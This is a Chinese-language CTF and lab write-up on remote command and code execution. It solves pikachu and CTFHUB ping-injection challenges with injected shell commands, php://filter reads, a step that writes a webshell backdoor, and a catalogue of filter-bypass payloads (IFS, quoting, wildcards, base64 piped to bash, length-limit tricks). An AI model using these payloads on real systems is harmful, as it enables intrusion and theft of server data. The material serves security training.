2021-10-23-远程代码执行漏洞(pikachu&CTFHUB))

RCE远程命令/代码执行漏洞

RCE英文全称：remote command/code execute。分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因：没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上，一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。其实这就是一个接口，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。

常用的管道符

a.png

pikachu（ping）

一个文本框，输入ip地址可以进行ping操作，查看源码，发现队输入的”ip“地址没有进行过滤

b.png

利用管道符就可以实现任意代码执行。

c.png

pikachu（echo）

这个也是一样的，只是后台的命令是echo，没有过滤的话任何内容都可以执行。

d.png

输入框中输入phpinfo();，执行结果如下图：

e1.png

一般常用的命令执行语句有

• system('ls'); (system('ls /'); )

• system('cat flag'); (system('cat /flag'); )

• 127.0.0.1;cat 2160627659946.php | base64

  (ping 情况下，直接cat不出来时考虑是有特殊字符，base64编码一下)

RCE与文件包含

img

img

filter读源码：php://filter/read=convert.base64-encode/recource=index.php

ctfhub：?file=php://filter/resource=/flag

CTFHUB 命令注入

和pikachu的类似也是一个最简单的没有过滤的ping命令执行，试一下127.0.0.1;ls

e.png

可以看到有个奇怪的文件

f.png

但是尝试一下cat，没有输出，估计是有字符编码无法显示出来。

（其实这个时候右键看一下源码就看到flag了）

l.png

将文件内容base64编码后输出：127.0.0.1;cat xxxxx.php|base64

g.png

看到了一串base64编码内容，解码即可获得flag。

方法二

可以自己注入一个后门，然后蚁剑连接一下。

将一段脚本写入555.php：127.0.0.1&echo -e "">555.php

(一定要注意"$"前面的"")

ls可以看见这个文件，后面就是拿出菜刀了，略。

h.png

这个方法二也可以应用与下面几个存在过滤的情况下。

常见的过滤及绕过技巧

过滤cat

i.png

• 反斜杠 ： 例如 ca\t flag.php

• 单(双)引号： 例如 ca''t flag.txt

• $1：例如ca$1t flag.txt

• 拼接：例如 a=c;b=at;b flag.txt

• 通配符(? 或*)：例如：ca? flag.txt

  /???会去寻找 / 目录下的三个字符长度的文件，正常情况下会寻找到/bin，然后/?a会优先匹配到/bin/cat,就成功调用了cat命令，然后后面可以使用正常的通配符匹配所需读的文件，如flag.txt文件名长度为8，使用8个?’’，此命令就会读取所有长度为8的文件。

  /???/?[a][t] ?''?''?''?''?''?''?''?''
  

• 读取文件的替代指令：more cat tac head tail less more

  https://www.cnblogs.com/ur10ser/p/7624367.html

  tac 从最后一行倒序显示内容，并将所有内容输出 more 根据窗口大小，一页一页的现实文件内容 less 和more类似，但其优点可以往前翻页，而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行 nl 类似于cat -n，显示时输出行号 tailf 类似于tail -f

选择一个方法，还是base64一下输出，之后解密一下就有flag了。

j.png

过滤空格：

• ${IFS}（$IFS$9）($IFS)：cat${IFS}flag.txt

• <> (<) (>)：cat<>flag.txt

• {cat,flag}

• %09 ：cat%09flag.txt

  （这种编码绕过的方式要在url框中输入，在题目中的文本框中输入无效）

其他绕过

• 反引号(内联执行):反引号和$()都可用来表示命令，被包含的字符串会被当做命令首先执行。

• base64：base64( "cat test.php")=Y2F0IHRlc3QucGhw

  //将base64解码后的命令通过管道符传递给bash
  echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash
  

两个结合起来

//反引号包含base64解码后的命令
`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`

• "?>" 代替 ";" ：在php中可以用?>来代替最后一个
  （php遇到定界符关闭标志时，会自动在php语句之后加上一个分号）

长度限制过滤

• >>：使用>>每次添加一部分命令到文件中，然后使用cat r | bash执行命令

  echo -n "cmd1" >> r;
  echo -n "cmd2" >> r;
  cat r | bash
  

• \：使用换行执行和ls -t绕过长度限制

  ls -t将文件按时间排序输出
  sh命令可以从一个文件中读取命令来执行

   root@kali:~/桌面# echo "flag{hahaha}" > flag.txt
   root@kali:~/桌面# touch "ag"
   root@kali:~/桌面# touch "fl\\"
   root@kali:~/桌面# touch "t \\"
   root@kali:~/桌面# touch "ca\\"
   root@kali:~/桌面# ls -t
   'ca\'  't \'  'fl\'   ag   flag
   root@kali:~/桌面# ls -t >a     #将 ls -t 内容写入到a文件中
   root@kali:~/桌面# sh a
   a: 1: a: not found
   flag{hahaha}
   a: 6: flag.txt: not found
  

运算符过滤

• 过滤"/" :用cd进入目录即可

• 过滤“；”，“|”，“||”，“&”

小结：CTFHUB 综合过滤：

m.png

%0a代替换行，%09代替TAB键（因为flag被过滤了，所以我们通过TAB来补全flag_is_here）

%5c代替\（用\来分隔开cat，因为cat也被过滤了）

127.0.0.1%0als%09*：tab键可以自动补齐后面的内容ls%09*可查看所有的文件

n.png

payload：ip=127.0.0.1%0Acd%09*_is_here%0Ac%27%27at%09*.php

参考资料：

https://blog.csdn.net/qq_43814486/article/details/90020139

https://www.icode9.com/content-4-812303.html

https://www.cnblogs.com/0yst3r-2046/p/12600073.html

https://blog.csdn.net/weixin_42373789/article/details/113451481

https://www.cnblogs.com/0yst3r-2046/p/12617703.html

https://blog.csdn.net/qq_44657899/article/details/107676580